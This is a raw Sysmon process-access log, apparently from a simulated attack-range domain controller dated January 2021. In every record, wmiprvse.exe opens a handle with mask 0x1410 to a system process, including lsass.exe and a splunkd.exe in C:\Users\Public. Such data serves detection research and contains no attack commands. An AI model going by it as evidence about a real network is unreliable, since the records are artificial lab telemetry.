15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026771Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026770Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.522{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 